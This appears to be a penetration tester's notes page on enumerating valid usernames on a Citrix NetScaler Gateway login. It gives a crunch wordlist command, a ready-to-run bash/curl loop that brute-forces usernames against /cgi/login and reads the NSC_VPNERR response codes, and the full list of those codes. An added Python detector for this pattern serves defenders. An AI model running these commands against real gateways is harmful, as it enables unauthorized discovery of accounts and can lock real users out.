User Enumeration

Citrix Netscaler Gateway

It is possible to enumerate internal users by brute-forcing the username on the Citrix Netscaler Gateway web interface.

Generate wordlist of possible users

Use a tool to generate a wordlist of all possible usernames based on the company schema. An easy example I have already run into in a real engagement was the first letter of the first name and the first letter of the last name (e.g. sb).

crunch 2 2 abcdefghijklmnopqrstuvwxyz -o users.txt

Enumerate valid users

Once you have a proper wordlist, enumerate valid users with the following bash one-liner:

for u in $(cat <USERLIST>); do curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=$u" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR=4001" >/dev/null && echo "[+] Found valid user: $u"; done | tee <VALID USERS OUTPUT FILE>

Be careful not to lock users out! Every request is a real authentication attempt with wrong credentials.
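
On the gateway side, the loop above appears as one source sending a single failed login for many different usernames within a short time. The following is an added example, not part of the original page, that flags this pattern. The log line format, the window and the threshold are assumptions, and the sample events are constructed.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 300      # assumed sliding window
MAX_DISTINCT_USERS = 5    # assumed limit of distinct usernames per source

# Constructed events, NOT a real NetScaler log format:
# "<epoch_seconds> <source_ip> <username> <NSC_VPNERR code>"
SAMPLE = (
    # one source walking a two-letter wordlist, one attempt per username
    [f"{1700000000 + 2 * i} 203.0.113.7 a{c} 4001" for i, c in enumerate("abcdefgh")]
    # one user mistyping a password several times
    + [f"{1700000100 + 20 * i} 198.51.100.20 jdoe 4001" for i in range(6)]
    # shared egress IP: different users failing hours apart
    + [f"{1700000000 + 3600 * i} 192.0.2.44 user{i} 4001" for i in range(6)]
)

def parse_event(line):
    """Split one constructed log line into (ts, src, user, code)."""
    ts, src, user, code = line.split()
    return int(ts), src, user.lower(), int(code)

def find_enumeration_sources(lines, window=WINDOW_SECONDS, limit=MAX_DISTINCT_USERS):
    """Return {source_ip: peak distinct usernames} for every source that fails
    logins for more than `limit` distinct usernames within `window` seconds."""
    recent = defaultdict(deque)   # source -> (ts, user) pairs still in the window
    flagged = {}
    for ts, src, user, code in sorted(parse_event(l) for l in lines if l.strip()):
        if not 4001 <= code <= 4019:   # login error range listed in en.xml
            continue
        q = recent[src]
        q.append((ts, user))
        while q[0][0] <= ts - window:  # drop attempts that left the window
            q.popleft()
        distinct = len({u for _, u in q})
        if distinct > limit:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged

if __name__ == "__main__":
    for src, count in find_enumeration_sources(SAMPLE).items():
        print(f"possible username enumeration from {src}: {count} usernames")
```

Counting distinct usernames rather than total failures keeps a single user's repeated typos from raising the alert, while slow enumeration spread beyond the window needs a longer window or a per-day count.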

Other response status

Get miscellaneous information about any user based on the status response:

curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=<USERNAME>" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR"

All response status codes can be found in the following XML file: https://<HOSTNAME>/logon/themes/Default/resources/en.xml

<String id="errorMessageLabel4001">Incorrect user name or password.</String>
<String id="errorMessageLabel4002">You do not have permission to log on.</String>
<String id="errorMessageLabel4003">Cannot connect to server. Try connecting again in a few minutes.</String>
<String id="errorMessageLabel4004">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4005">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4006">Incorrect user name.  </String>
<String id="errorMessageLabel4007">Incorrect password.</String>
<String id="errorMessageLabel4008">Passwords do not match.</String>
<String id="errorMessageLabel4009">User not found.</String>
<String id="errorMessageLabel4010">You do not have permission to log on at this time.</String>
<String id="errorMessageLabel4011">Your account is disabled.</String>
<String id="errorMessageLabel4012">Your password has expired.</String>
<String id="errorMessageLabel4013">You do not have permission to log on.</String>
<String id="errorMessageLabel4014">Could not change your password.</String>
<String id="errorMessageLabel4015">Your account is temporarily locked.  </String>
<String id="errorMessageLabel4016">Could not update your password. The password must meet the length, complexity, and history requirements of the domain.</String>
<String id="errorMessageLabel4017">Unable to process your request.</String>
<String id="errorMessageLabel4018">Your device failed to meet compliance requirements. Please check with your administrator.</String>
<String id="errorMessageLabel4019">Your device is not managed. Please check with your administrator.</String>
<String id="errorMessageLabelMax">4019</String>

Be careful not to lock users out! Every request is a real authentication attempt with wrong credentials.